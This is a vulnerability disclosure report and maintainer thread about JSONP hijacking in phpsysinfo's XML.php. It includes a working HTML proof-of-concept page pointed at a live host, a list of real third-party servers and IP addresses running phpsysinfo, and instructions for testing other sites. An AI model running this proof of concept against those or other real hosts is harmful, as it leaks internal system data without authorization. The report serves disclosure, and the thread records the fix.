XML.php JSONP hijacking in phpsysinfo/phpsysinfo
Reported on
Apr 27th 2023
Description
The XML.php file has a JSONP hijacking vulnerability. When a user visits a page carefully crafted by the attacker, the JSON data is obtained and sent to the attacker.
Proof of Concept
We created an HTML file as a proof of concept to showcase the vulnerability. This HTML file will attempt to retrieve the JSON data from https://phpbb.trabitechnik.com/xml.php and display it in a pop-up window.
Of course, in a real-world attack, an attacker would simply use a PHP file to send the retrieved JSON data to their server using an XMLHttpRequest.
Here is the HTML code for the proof of concept file:
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> <script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script> </head> <body> <script> function dezsbrxdio(data){ alert(JSON.stringify(data)); } </script> <script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio"></script> </body> </html>
Here are some online assets using phpsysinfo that I have found: https://server.wxp-3.nl/xml.php https://sysinfo.pouserinet.fi/xml.php https://zvoyc1uy16u7hu9e.myfritz.net/xml.php http://204.11.55.179/xml.php http://204.11.55.87/xml.php http://88.67.242.79/xml.php http://217.131.251.40/xml.php
If we want to easily test whether a website is vulnerable to this exploit, we can simply replace "phpbb.trabitechnik.com" in the HTML file with the URL of the website we want to test. We can open the modified HTML file and check if a pop-up window is displayed with the JSON data retrieved from the website. If a pop-up window appears with the JSON data, then the website is vulnerable to the JSONP hijacking exploit.
Impact
If a website's internal network information or other sensitive data is exposed through JSONP and vulnerable to hijacking, the consequences could be severe.
An attacker could potentially retrieve sensitive information such as IP addresses, server names, network topologies, and other data that could be used to map out the internal network structure. This information could then be used to identify additional targets within the network and launch more targeted attacks.
In addition, if the website is part of a larger system or network, the attacker could use the information obtained through JSONP hijacking to gain access to other systems or sensitive data within the network.
Overall, the potential consequences of JSONP hijacking are significant and can lead to a range of security issues and data breaches. It is important for website administrators to ensure that their systems are not vulnerable to this exploit and to take appropriate measures to mitigate the risk.
SECURITY.md
5 months ago
I sincerely hope that we can all work together with joy and enthusiasm to help the author fix this vulnerability, especially with the valuable assistance of Huntr.dev’s staff who created the issue on GitHub.
Phpsysinfo was created precisely to provide information about the computer, so there is no disadvantage to doing what it was designed to do. The protection against hijacking can be the use of the https protocol.
Hello, it seems that you are not familiar with the JSONP hijacking vulnerability. As you mentioned, Phpsysinfo was designed to provide information about computers, making it a sensitive page that is typically located on an internal network. With this proof of concept (POC), we can obtain data from the Phpsysinfo page within the internal network.
It's important to note that using HTTPS doesn't solve this issue, as it's a problem with the code itself. It's crucial to address this vulnerability and implement proper security measures to protect against potential attacks.
If you believe that the data on the Phpsysinfo page should be made public, then it would likely violate information security policies and regulations.
Data privacy and security are critical concerns in today's digital age, and it's important to adhere to industry-standard best practices to safeguard sensitive information. Making such data publicly accessible without proper authorization could result in data breaches, loss of confidential information, and even legal consequences. Therefore, it's essential to evaluate the sensitivity of data and implement appropriate security measures to protect it from unauthorized access or exposure.
In a few days I will try to disable jsonp support in default settings. It will need to be explicitly enabled in settings.
Done: https://github.com/phpsysinfo/phpsysinfo/commit/4f2cee505e4f2e9b369a321063ff2c5e0c34ba45
Okay!!!! Thats's good! I hope you can apply for a CVE number for this vulnerability..
